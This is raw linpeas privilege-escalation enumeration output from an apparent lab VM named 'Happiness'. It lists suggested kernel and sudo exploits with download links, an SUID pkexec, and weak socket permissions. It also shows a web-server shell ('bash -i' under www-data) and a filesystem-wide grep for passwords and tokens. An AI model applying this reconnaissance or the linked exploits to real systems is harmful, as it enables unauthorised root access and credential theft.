╔══════════╣ Date & uptime
41
Sat 24 Jan 2026 02:19:09 AM EST
42
 02:19:09 up 52 min,  2 users,  load average: 0.00, 0.00, 1.56
43
╔══════════╣ Unmounted file-system?
44
╚ Check if you can mount umounted devices
45
UUID=80e68759-1ca0-45eb-82a7-601b1f78dfe5 /               ext4    errors=remount-ro 0       1
46
UUID=257f425d-1ea4-4b8e-8dd8-69523f25d249 none            swap    sw              0       0
47
/dev/sr0        /media/cdrom0   udf,iso9660 user,noauto     0       0
48
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
49
disk
50
sda
51
sda1
52
sda2
53
sda5
54
╔══════════╣ Environment
55
╚ Any private information inside environment variables?
56
USER=Eecho
57
SSH_CLIENT=192.168.0.108 39356 22
58
SHLVL=1
59
HOME=/home/Eecho
60
SSH_TTY=/dev/pts/0
61
LOGNAME=Eecho
62
_=./linpeas.sh
63
TERM=xterm-256color
64
XDG_RUNTIME_DIR=/run/user/1000
65
LANG=en_US.UTF-8
66
SHELL=/bin/bash
67
PWD=/home/Eecho
68
SSH_CONNECTION=192.168.0.108 39356 192.168.0.106 22
69
╔══════════╣ Searching Signature verification failed in dmesg
70
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#dmesg-signature-verification-failed
71
dmesg Not Found
72
╔══════════╣ Executing Linux Exploit Suggester
73
╚ https://github.com/mzet-/linux-exploit-suggester
74
[+] [CVE-2019-13272] PTRACE_TRACEME
75
   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
76
   Exposure: highly probable
77
   Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*} ],fedora=30{kernel:5.0.9-*}
78
   Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47133.zip
79
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
80
   Comments: Requires an active PolKit agent.
81
[+] [CVE-2021-4034] PwnKit
82
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
83
   Exposure: probable
84
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,[ debian=7|8|9|10|11 ],fedora,manjaro
85
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
86
[+] [CVE-2021-3156] sudo Baron Samedit
87
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
88
   Exposure: less probable
89
   Tags: mint=19,ubuntu=18|20, debian=10
90
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
91
[+] [CVE-2021-3156] sudo Baron Samedit 2
92
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
93
   Exposure: less probable
94
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
95
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
96
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
97
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
98
   Exposure: less probable
99
   Tags: ubuntu=20.04{kernel:5.8.0-*}
100
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
101
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
102
   Comments: ip_tables kernel module must be loaded
103
╔══════════╣ Protections
104
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
105
apparmor module is loaded.
106
═╣ AppArmor profile? .............. unconfined
107
═╣ is linuxONE? ................... s390x Not Found
108
═╣ grsecurity present? ............ grsecurity Not Found
109
═╣ PaX bins present? .............. PaX Not Found
110
═╣ Execshield enabled? ............ Execshield Not Found
111
═╣ SELinux enabled? ............... sestatus Not Found
112
═╣ Seccomp enabled? ............... disabled
113
═╣ User namespace? ................ enabled
114
═╣ Cgroup2 enabled? ............... enabled
115
═╣ Is ASLR enabled? ............... Yes
116
═╣ Printer? ....................... No
117
═╣ Is this a virtual machine? ..... Yes (oracle)
118
╔══════════╣ Kernel Modules Information
119
══╣ Kernel modules with weak perms?
120
══╣ Kernel modules loadable?
121
Modules can be loaded
122

123
                                   ╔═══════════╗
124
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
125
                                   ╚═══════════╝
126
╔══════════╣ Container related tools present (if any):
127
/usr/sbin/apparmor_parser
128
/usr/bin/nsenter
129
/usr/bin/unshare
130
/usr/sbin/chroot
131
/usr/sbin/capsh
132
/usr/sbin/setcap
133
/usr/sbin/getcap
134
╔══════════╣ Container details
135
═╣ Is this a container? ........... No
136
═╣ Any running containers? ........ No
137

138
                                     ╔═══════╗
139
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
140
                                     ╚═══════╝
141
Learn and practice cloud hacking techniques in https://training.hacktricks.xyz
142
═╣ GCP Virtual Machine? ................. No
143
═╣ GCP Cloud Funtion? ................... No
144
═╣ AWS ECS? ............................. No
145
═╣ AWS EC2? ............................. No
146
═╣ AWS EC2 Beanstalk? ................... No
147
═╣ AWS Lambda? .......................... No
148
═╣ AWS Codebuild? ....................... No
149
═╣ DO Droplet? .......................... No
150
═╣ IBM Cloud VM? ........................ No
151
═╣ Azure VM or Az metadata? ............. No
152
═╣ Azure APP or IDENTITY_ENDPOINT? ...... No
153
═╣ Azure Automation Account? ............ No
154
═╣ Aliyun ECS? .......................... No
155
═╣ Tencent CVM? ......................... No
156
                ╔════════════════════════════════════════════════╗
157
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
158
                ╚════════════════════════════════════════════════╝
159
╔══════════╣ Running processes (cleaned)
160
╚ Check weird & unexpected processes run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes
161
root           1  0.0  0.4  98844 10204 ?        Ss   01:27   0:00 /sbin/init
162
root         225  0.0  0.7  48996 14788 ?        Ss   01:27   0:00 /lib/systemd/systemd-journald
163
root         249  0.0  0.2  22280  5776 ?        Ss   01:27   0:00 /lib/systemd/systemd-udevd
164
systemd+     278  0.0  0.3  89036  6208 ?        Ssl  01:27   0:00 /lib/systemd/systemd-timesyncd
165
  └─(Caps) 0x0000000002000000=cap_sys_time
166
root         320  0.0  0.1   6736  2700 ?        Ss   01:27   0:00 /usr/sbin/cron -f
167
message+     321  0.0  0.2   7836  4268 ?        Ss   01:27   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
168
  └─(Caps) 0x0000000020000000=cap_audit_write
169
root         323  0.0  0.2 222784  5796 ?        Ssl  01:27   0:00 /usr/sbin/rsyslogd -n -iNONE
170
root         336  0.0  0.3  22532  7400 ?        Ss   01:27   0:00 /lib/systemd/systemd-logind
171
root         339  0.0  0.2   9588  5672 ?        Ss   01:27   0:00 /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
172
root         361  0.0  0.0   2500  1640 ?        S    01:27   0:00 /usr/sbin/inetutils-inetd
173
root         367  0.0  0.0   5840  1664 tty1     Ss+  01:27   0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
174
Eecho      12527  0.0  0.2  14508  5688 ?        S    02:12   0:00  |   _ sshd: Eecho@pts/0
175
Eecho      12528  0.0  0.1   7084  3756 pts/0    Ss   02:12   0:00  |       _ -bash
176
Eecho      12580  0.0  0.1   3420  2536 pts/0    S+   02:19   0:00  |           _ /bin/sh ./linpeas.sh
177
Eecho      15655  0.0  0.0   3420  1032 pts/0    S+   02:22   0:00  |               _ /bin/sh ./linpeas.sh
178
Eecho      15659  0.0  0.1  11844  3364 pts/0    R+   02:22   0:00  |               |   _ ps fauxwww
179
Eecho      15658  0.0  0.0   3420  1032 pts/0    S+   02:22   0:00  |               _ /bin/sh ./linpeas.sh
180
Eecho      12554  0.0  0.2  14508  4704 ?        S    02:14   0:00      _ sshd: Eecho@pts/1
181
Eecho      12555  0.0  0.1   7084  3628 pts/1    Ss+  02:14   0:00          _ -bash
182
root         386  0.0  0.1   8556  3852 ?        Ss   01:27   0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
183
root         394  0.0  1.0 108880 21148 ?        Ssl  01:27   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
184
root         427  0.0  1.7 253832 34820 ?        Ss   01:27   0:00 /usr/sbin/apache2 -k start
185
www-data     626  0.1  0.9 254164 18968 ?        S    01:35   0:03  _ /usr/sbin/apache2 -k start
186
www-data     627  0.1  0.8 254164 16800 ?        S    01:35   0:03  _ /usr/sbin/apache2 -k start
187
www-data     629  0.1  0.8 254020 16628 ?        S    01:35   0:03  _ /usr/sbin/apache2 -k start
188
www-data     634  0.1  0.8 254020 16740 ?        S    01:35   0:03  _ /usr/sbin/apache2 -k start
189
www-data   12266  0.0  0.0   2472   568 ?        S    02:02   0:00  |   _ sh -c uname -a; w; id; bash -i
190
www-data   12271  0.0  0.1   3952  3176 ?        S    02:02   0:00  |       _ bash -i
191
www-data   12272  0.0  0.1   3428  2244 ?        S    02:02   0:00  |           _ grep -RIn --color=auto password|passwd|pwd|secret|token|apikey|api_key|key=|db_pass|db_user|mysql|redis|auth /
192
www-data     637  0.1  0.8 254156 16944 ?        S    01:35   0:03  _ /usr/sbin/apache2 -k start
193
www-data     642  0.1  0.8 254020 17096 ?        S    01:35   0:03  _ /usr/sbin/apache2 -k start
194
www-data     647  0.1  0.8 254156 16824 ?        S    01:35   0:03  _ /usr/sbin/apache2 -k start
195
www-data     648  0.1  0.8 254028 16464 ?        S    01:35   0:03  _ /usr/sbin/apache2 -k start
196
www-data     675  0.1  0.8 254156 16948 ?        S    01:35   0:03  _ /usr/sbin/apache2 -k start
197
www-data     685  0.1  0.8 254020 16412 ?        S    01:35   0:03  _ /usr/sbin/apache2 -k start
198
Eecho      12507  0.0  0.4  15924  8888 ?        Ss   02:12   0:00 /lib/systemd/systemd --user
199
Eecho      12508  0.0  0.1  99760  2468 ?        S    02:12   0:00  _ (sd-pam)
200
╔══════════╣ Processes with unusual configurations
201

202
╔══════════╣ Processes with credentials in memory (root req)
203
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#credentials-from-process-memory
204
gdm-password Not Found
205
gnome-keyring-daemon Not Found
206
lightdm Not Found
207
vsftpd process found (dump creds from memory as root)
208
apache2 process found (dump creds from memory as root)
209
sshd: process found (dump creds from memory as root)
210
mysql process found (dump creds from memory as root)
211
postgres Not Found
212
redis-server Not Found
213
mongod Not Found
214
memcached Not Found
215
elasticsearch Not Found
216
jenkins Not Found
217
tomcat Not Found
218
nginx Not Found
219
php-fpm Not Found
220
supervisord Not Found
221
vncserver Not Found
222
xrdp Not Found
223
teamviewer Not Found
224
╔══════════╣ Opened Files by processes
225
Process 12507 (Eecho) - /lib/systemd/systemd --user
226
  └─ Has open files:
227
    └─ /proc/12507/mountinfo
228
    └─ /proc/swaps
229
    └─ /sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service
230
Process 12528 (Eecho) - -bash
231
  └─ Has open files:
232
    └─ /dev/pts/0
233
Process 12555 (Eecho) - -bash
234
  └─ Has open files:
235
    └─ /dev/pts/1
236
╔══════════╣ Processes with memory-mapped credential files
237
╔══════════╣ Processes whose PPID belongs to a different user (not root)
238
╚ You will know if a user can somehow spawn processes as a different user
239
╔══════════╣ Files opened by processes belonging to other users
240
╚ This is usually empty because of the lack of privileges to read other user processes information
241
╔══════════╣ Check for vulnerable cron jobs
242
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs
243
══╣ Cron jobs list
244
/usr/bin/crontab
245
incrontab Not Found
246
-rw-r--r-- 1 root root    1042 Oct 11  2019 /etc/crontab
247
/etc/cron.d:
248
total 16
249
drwxr-xr-x  2 root root 4096 Apr  1  2025 .
250
drwxr-xr-x 83 root root 4096 Jan 24 02:15 ..
251
-rw-r--r--  1 root root  712 Mar  9  2025 php
252
-rw-r--r--  1 root root  102 Oct 11  2019 .placeholder
253
/etc/cron.daily:
254
total 36
255
drwxr-xr-x  2 root root 4096 Apr  1  2025 .
256
drwxr-xr-x 83 root root 4096 Jan 24 02:15 ..
257
-rwxr-xr-x  1 root root  539 Jul  1  2024 apache2
258
-rwxr-xr-x  1 root root 1478 Apr 19  2021 apt-compat
259
-rwxr-xr-x  1 root root  355 Dec 29  2017 bsdmainutils
260
-rwxr-xr-x  1 root root 1187 May 24  2022 dpkg
261
-rwxr-xr-x  1 root root  377 Aug 28  2018 logrotate
262
-rwxr-xr-x  1 root root  249 Sep 27  2017 passwd
263
-rw-r--r--  1 root root  102 Oct 11  2019 .placeholder
264
/etc/cron.hourly:
265
total 12
266
drwxr-xr-x  2 root root 4096 Mar 18  2025 .
267
drwxr-xr-x 83 root root 4096 Jan 24 02:15 ..
268
-rw-r--r--  1 root root  102 Oct 11  2019 .placeholder
269
/etc/cron.monthly:
270
total 12
271
drwxr-xr-x  2 root root 4096 Mar 18  2025 .
272
drwxr-xr-x 83 root root 4096 Jan 24 02:15 ..
273
-rw-r--r--  1 root root  102 Oct 11  2019 .placeholder
274
/etc/cron.weekly:
275
total 12
276
drwxr-xr-x  2 root root 4096 Mar 18  2025 .
277
drwxr-xr-x 83 root root 4096 Jan 24 02:15 ..
278
-rw-r--r--  1 root root  102 Oct 11  2019 .placeholder
279
SHELL=/bin/sh
280
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
281
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
282
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
283
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
284
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
285
══╣ Checking for specific cron jobs vulnerabilities
286
Checking cron directories...
287

288
╔══════════╣ System timers
289
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers
290
══╣ Active timers:
291
NEXT                        LEFT          LAST                        PASSED        UNIT                         ACTIVATES
292
Sat 2026-01-24 02:39:00 EST 16min left    Sat 2026-01-24 02:09:43 EST 12min ago     phpsessionclean.timer        phpsessionclean.service
293
Sat 2026-01-24 06:54:10 EST 4h 31min left Sat 2026-01-24 02:07:53 EST 14min ago     apt-daily-upgrade.timer      apt-daily-upgrade.service
294
Sat 2026-01-24 08:00:10 EST 5h 37min left Thu 2026-01-22 12:17:33 EST 1 day 14h ago apt-daily.timer              apt-daily.service
295
Sun 2026-01-25 00:00:00 EST 21h left      Sat 2026-01-24 01:26:56 EST 55min ago     logrotate.timer              logrotate.service
296
Sun 2026-01-25 01:42:43 EST 23h left      Sat 2026-01-24 01:42:43 EST 39min ago     systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
297
══╣ Disabled timers:
298
══╣ Additional timer files:
299

300
╔══════════╣ Services and Service Files
301
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#services
302

303
══╣ Active services:
304
apache2.service                    loaded active running The Apache HTTP Server
305
./linpeas.sh: 3944: local: /usr/sbin/apachectl: bad variable name
306
 Not Found
307
══╣ Disabled services:
308
apache-htcacheclean.service            disabled enabled
309
apache-htcacheclean@.service           disabled enabled
310
apache2@.service                       disabled enabled
311
console-getty.service                  disabled disabled
312
debug-shell.service                    disabled disabled
313
ifupdown-wait-online.service           disabled enabled
314
irc_bot.service                        disabled enabled
315
serial-getty@.service                  disabled enabled
316
systemd-boot-check-no-failures.service disabled disabled
317
systemd-network-generator.service      disabled disabled
318
systemd-networkd-wait-online.service   disabled disabled
319
systemd-networkd.service               disabled enabled
320
systemd-resolved.service               disabled enabled
321
systemd-time-wait-sync.service         disabled disabled
322
14 unit files listed.
323
══╣ Additional service files:
324
./linpeas.sh: 3944: local: /usr/sbin/apachectl: bad variable name
325
You can't write on systemd PATH
326
╔══════════╣ Systemd Information
327
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths
328
═╣ Systemd version and vulnerabilities? .............. 247.3
329
═╣ Services running as root? .....
330
═╣ Running services with dangerous capabilities? ...
331
═╣ Services with writable paths? . apache2.service: Uses relative path 'start' (from ExecStart=/usr/sbin/apachectl start)
332
rsyslog.service: Uses relative path '-n' (from ExecStart=/usr/sbin/rsyslogd -n -iNONE)
333
╔══════════╣ Systemd PATH
334
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths
335
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
336

337
╔══════════╣ Analyzing .socket files
338
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets
339
./linpeas.sh: 4207: local: /run/systemd/journal/stdout: bad variable name
340

341
╔══════════╣ Unix Sockets Analysis
342
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets
343
/run/dbus/system_bus_socket
344
  └─(Read Write (Weak Permissions: 666) )
345
  └─(Owned by root)
346
/run/systemd/fsck.progress
347
/run/systemd/inaccessible/sock
348
/run/systemd/io.system.ManagedOOM
349
  └─(Read Write (Weak Permissions: 666) )
350
  └─(Owned by root)
351
/run/systemd/journal/dev-log
352
  └─(Read Write (Weak Permissions: 666) )
353
  └─(Owned by root)
354
/run/systemd/journal/io.systemd.journal
355
/run/systemd/journal/socket
356
  └─(Read Write (Weak Permissions: 666) )
357
  └─(Owned by root)
358
/run/systemd/journal/stdout
359
  └─(Read Write (Weak Permissions: 666) )
360
  └─(Owned by root)
361
/run/systemd/journal/syslog
362
  └─(Read Write (Weak Permissions: 666) )
363
  └─(Owned by root)
364
/run/systemd/notify
365
  └─(Read Write Execute (Weak Permissions: 777) )
366
  └─(Owned by root)
367
/run/systemd/private
368
  └─(Read Write Execute (Weak Permissions: 777) )
369
  └─(Owned by root)
370
/run/systemd/userdb/io.systemd.DynamicUser
371
  └─(Read Write (Weak Permissions: 666) )
372
  └─(Owned by root)
373
/run/udev/control
374
/run/user/1000/bus
375
  └─(Read Write (Weak Permissions: 666) )
376
/run/user/1000/gnupg/S.dirmngr
377
  └─(Read Write )
378
/run/user/1000/gnupg/S.gpg-agent
379
  └─(Read Write )
380
/run/user/1000/gnupg/S.gpg-agent.browser
381
  └─(Read Write )
382
/run/user/1000/gnupg/S.gpg-agent.extra
383
  └─(Read Write )
384
/run/user/1000/gnupg/S.gpg-agent.ssh
385
  └─(Read Write )
386
/run/user/1000/pk-debconf-socket
387
  └─(Read Write (Weak Permissions: 666) )
388
/run/user/1000/systemd/inaccessible/sock
389
/run/user/1000/systemd/notify
390
  └─(Read Write Execute )
391
/run/user/1000/systemd/private
392
  └─(Read Write Execute )
393
╔══════════╣ D-Bus Analysis
394
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus
395
NAME                            PID PROCESS         USER             CONNECTION    UNIT                        SESSION DESCRIPTION
396
:1.0                            278 systemd-timesyn systemd-timesync :1.0          systemd-timesyncd.service   -       -
397
:1.1                              1 systemd         root             :1.1          init.scope                  -       -
398
:1.136                        24323 busctl          Eecho            :1.136        session-3.scope             3       -
399
:1.2                            336 systemd-logind  root             :1.2          systemd-logind.service      -       -
400
:1.3                            394 unattended-upgr root             :1.3          unattended-upgrades.service -       -
401
:1.6                          12507 systemd         Eecho            :1.6          user@1000.service           -       -
402
com.ubuntu.SoftwareProperties     - -               -                (activatable) -                           -       -
403
org.freedesktop.DBus              1 systemd         root             -             init.scope                  -       -
404
org.freedesktop.PackageKit        - -               -                (activatable) -                           -       -
405
org.freedesktop.PolicyKit1        - -               -                (activatable) -                           -       -
406
org.freedesktop.hostname1         - -               -                (activatable) -                           -       -
407
org.freedesktop.locale1           - -               -                (activatable) -                           -       -
408
org.freedesktop.login1          336 systemd-logind  root             :1.2          systemd-logind.service      -       -
409
org.freedesktop.network1          - -               -                (activatable) -                           -       -
410
org.freedesktop.resolve1          - -               -                (activatable) -                           -       -
411
org.freedesktop.systemd1          1 systemd         root             :1.1          init.scope                  -       -
412
org.freedesktop.timedate1         - -               -                (activatable) -                           -       -
413
org.freedesktop.timesync1       278 systemd-timesyn systemd-timesync :1.0          systemd-timesyncd.service   -       -
414
╔══════════╣ D-Bus Configuration Files
415
Analyzing /etc/dbus-1/system.d/com.ubuntu.SoftwareProperties.conf:
416
  └─(Allow rules in default context)
417
             └─     <allow send_destination="com.ubuntu.SoftwareProperties"
418
            <allow send_destination="com.ubuntu.SoftwareProperties"
419
            <allow send_destination="com.ubuntu.DeviceDriver"
420
Analyzing /etc/dbus-1/system.d/org.freedesktop.PackageKit.conf:
421
  └─(Allow rules in default context)
422
             └─     <allow send_destination="org.freedesktop.PackageKit"
423
            <allow send_destination="org.freedesktop.PackageKit"
424
            <allow send_destination="org.freedesktop.PackageKit"
425

426
══╣ D-Bus Session Bus Analysis
427
(Access to session bus available)
428
           string "org.freedesktop.DBus"
429
           string "org.freedesktop.systemd1"
430
           string ":1.0"
431
           string ":1.2"
432
  └─(Known dangerous session service: org.freedesktop.systemd1)
433
     └─ Try: dbus-send --session --dest=org.freedesktop.systemd1 / [Interface] [Method] [Arguments]
434
╔══════════╣ Legacy r-commands (rsh/rlogin/rexec) and host-based trust
435

436
══╣ Listening r-services (TCP 512-514)
437

438
══╣ systemd units exposing r-services
439
rlogin|rsh|rexec units Not Found
440

441
══╣ inetd/xinetd configuration for r-services
442
  No r-services found in /etc/inetd.conf
443
/etc/xinetd.d Not Found
444
══╣ Installed r-service server packages
445
ii  inetutils-inetd               2:2.0-1+deb11u2                             amd64        internet super server
446
══╣ /etc/hosts.equiv and /etc/shosts.equiv
447

448
══╣ Per-user .rhosts files
449
.rhosts Not Found
450
══╣ PAM rhosts authentication
451
/etc/pam.d/rlogin|rsh Not Found
452
══╣ SSH HostbasedAuthentication
453
  HostbasedAuthentication no or not set
454
══╣ Potential DNS control indicators (local)
455
  Not detected
456

457
╔══════════╣ Crontab UI (root) misconfiguration checks
458
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs
459
crontab-ui Not Found
460
                              ╔═════════════════════╗
461
══════════════════════════════╣ Network Information ╠══════════════════════════════
462
                              ╚═════════════════════╝
463
╔══════════╣ Interfaces
464
default         0.0.0.0
465
loopback        127.0.0.0
466
link-local      169.254.0.0
467

468
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
469
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
470
    inet 127.0.0.1/8 scope host lo
471
       valid_lft forever preferred_lft forever
472
    inet6 ::1/128 scope host
473
       valid_lft forever preferred_lft forever
474
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
475
    link/ether 08:00:27:bf:9e:c8 brd ff:ff:ff:ff:ff:ff
476
    inet 192.168.0.106/24 brd 192.168.0.255 scope global dynamic enp0s3
477
       valid_lft 6769sec preferred_lft 6769sec
478
    inet6 fe80::a00:27ff:febf:9ec8/64 scope link
479
       valid_lft forever preferred_lft forever
480
╔══════════╣ Hostname, hosts and DNS
481
══╣ Hostname Information
482
System hostname: Happiness
483
FQDN: Happiness
484

485
══╣ Hosts File Information
486
Contents of /etc/hosts:
487
  127.0.0.1     localhost
488
  127.0.1.1     PyCrt.PyCrt     PyCrt
489
  ::1     localhost ip6-localhost ip6-loopback
490
  ff02::1 ip6-allnodes
491
  ff02::2 ip6-allrouters
492
  127.0.0.1 Happiness
493
══╣ DNS Configuration
494
DNS Servers (resolv.conf):
495
  192.168.1.1
496
  192.168.0.1
497
-e
498
Systemd-resolved configuration:
499
  [Resolve]
500
-e
501
DNS Domain Information:
502
(none)
503
-e
504
DNS Cache Status (systemd-resolve):
505
╔══════════╣ Active Ports
506
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports
507
══╣ Active Ports (ss)
508
tcp     LISTEN   0        32               0.0.0.0:21            0.0.0.0:*
509
tcp     LISTEN   0        128              0.0.0.0:22            0.0.0.0:*
510
tcp     LISTEN   0        10             127.0.0.1:23            0.0.0.0:*
511
tcp     LISTEN   0        10             127.0.0.1:37            0.0.0.0:*
512
tcp     LISTEN   0        10             127.0.0.1:7             0.0.0.0:*
513
tcp     LISTEN   0        10             127.0.0.1:9             0.0.0.0:*
514
tcp     LISTEN   0        10             127.0.0.1:13            0.0.0.0:*
515
tcp     LISTEN   0        10             127.0.0.1:19            0.0.0.0:*
516
tcp     LISTEN   0        128                 [::]:22               [::]:*
517
tcp     LISTEN   0        128                    *:80                  *:*
518

519
╔══════════╣ Network Traffic Analysis Capabilities
520

521
══╣ Available Sniffing Tools
522
No sniffing tools found
523

524
══╣ Network Interfaces Sniffing Capabilities
525
Interface enp0s3: Not sniffable
526
No sniffable interfaces found
527

528
╔══════════╣ Firewall Rules Analysis
529

530
══╣ Iptables Rules
531
No permission to list iptables rules
532

533
══╣ Nftables Rules
534
nftables Not Found
535

536
══╣ Firewalld Rules
537
firewalld Not Found
538

539
══╣ UFW Rules
540
ufw Not Found
541

542
╔══════════╣ Inetd/Xinetd Services Analysis
543

544
══╣ Inetd Services
545
inetd Not Found
546
══╣ Xinetd Services
547
xinetd Not Found
548

549
══╣ Running Inetd/Xinetd Services
550
-e
551
Active Services (from ss):
552
-e
553
Running Service Processes:
554
361
555
inetutils-inetd
556

557
╔══════════╣ Internet Access?
558
DNS accessible
559
ICMP is accessible
560
Port 443 is accessible
561
Port 80 is accessible
562
Port 443 is not accessible with wget
563

564

565

566
                               ╔═══════════════════╗
567
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
568
                               ╚═══════════════════╝
569
╔══════════╣ My user
570
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#users
571
uid=1000(Eecho) gid=1000(Eecho) groups=1000(Eecho)
572

573
╔══════════╣ PGP Keys and Related Files
574
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#pgp-keys
575
GPG:
576
GPG is installed, listing keys:
577
-e
578
NetPGP:
579
netpgpkeys Not Found
580
-e
581
PGP Related Files:
582
Found: /home/Eecho/.gnupg
583
total 16
584
drwx------ 2 Eecho Eecho 4096 Jan 24 02:22 .
585
drwxr-xr-x 3 Eecho Eecho 4096 Jan 24 02:22 ..
586
-rw------- 1 Eecho Eecho   32 Jan 24 02:22 pubring.kbx
587
-rw------- 1 Eecho Eecho 1200 Jan 24 02:22 trustdb.gpg
588

589
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
590
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
591

592

593
╔══════════╣ Checking sudo tokens
594
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#reusing-sudo-tokens
595
ptrace protection is disabled (0), so sudo tokens could be abused
596

597
doas.conf Not Found
598

599
╔══════════╣ Checking Pkexec and Polkit
600
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html#pe---method-2
601

602
══╣ Polkit Binary
603
Pkexec binary found at: /usr/bin/pkexec
604
Pkexec binary has SUID bit set!
605
-rwsr-xr-x 1 root root 23448 Jan 13  2022 /usr/bin/pkexec
606
pkexec version 0.105
607

608
══╣ Polkit Policies
609
Checking /etc/polkit-1/localauthority.conf.d/:
610

611
[Configuration]
612
AdminIdentities=unix-user:0
613
[Configuration]
614
AdminIdentities=unix-group:sudo
615
Checking /usr/share/polkit-1/rules.d/:
616
polkit.addRule(function(action, subject) {
617
    if ((action.id == "org.freedesktop.packagekit.upgrade-system" ||
618
         action.id == "org.freedesktop.packagekit.trigger-offline-update") &&
619
        subject.active == true && subject.local == true &&
620
        subject.isInGroup("sudo")) {
621
            return polkit.Result.YES;
622
    }
623
});
624
// Allow systemd-networkd to set timezone, get product UUID,
625
// and transient hostname
626
polkit.addRule(function(action, subject) {
627
    if ((action.id == "org.freedesktop.hostname1.set-hostname" ||
628
         action.id == "org.freedesktop.hostname1.get-product-uuid" ||
629
         action.id == "org.freedesktop.timedate1.set-timezone") &&
630
        subject.user == "systemd-network") {
631
        return polkit.Result.YES;
632
    }
633
});
634

635
══╣ Polkit Authentication Agent
636

637
╔══════════╣ Superusers and UID 0 Users
638
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html
639

640
══╣ Users with UID 0 in /etc/passwd
641
root:x:0:0:root:/root:/bin/bash
642

643
══╣ Users with sudo privileges in sudoers
644

645
╔══════════╣ Users with console
646
Eecho:x:1000:1000::/home/Eecho:/bin/bash
647
root:x:0:0:root:/root:/bin/bash
648

649
╔══════════╣ All users & groups
650
uid=0(root) gid=0(root) groups=0(root)
651
uid=1000(Eecho) gid=1000(Eecho) groups=1000(Eecho)
652
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
653
uid=101(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
654
uid=102(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
655
uid=103(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
656
uid=104(messagebus) gid=110(messagebus) groups=110(messagebus)
657
uid=105(sshd) gid=65534(nogroup) groups=65534(nogroup)
658
uid=106(ftp) gid=113(ftp) groups=113(ftp)
659
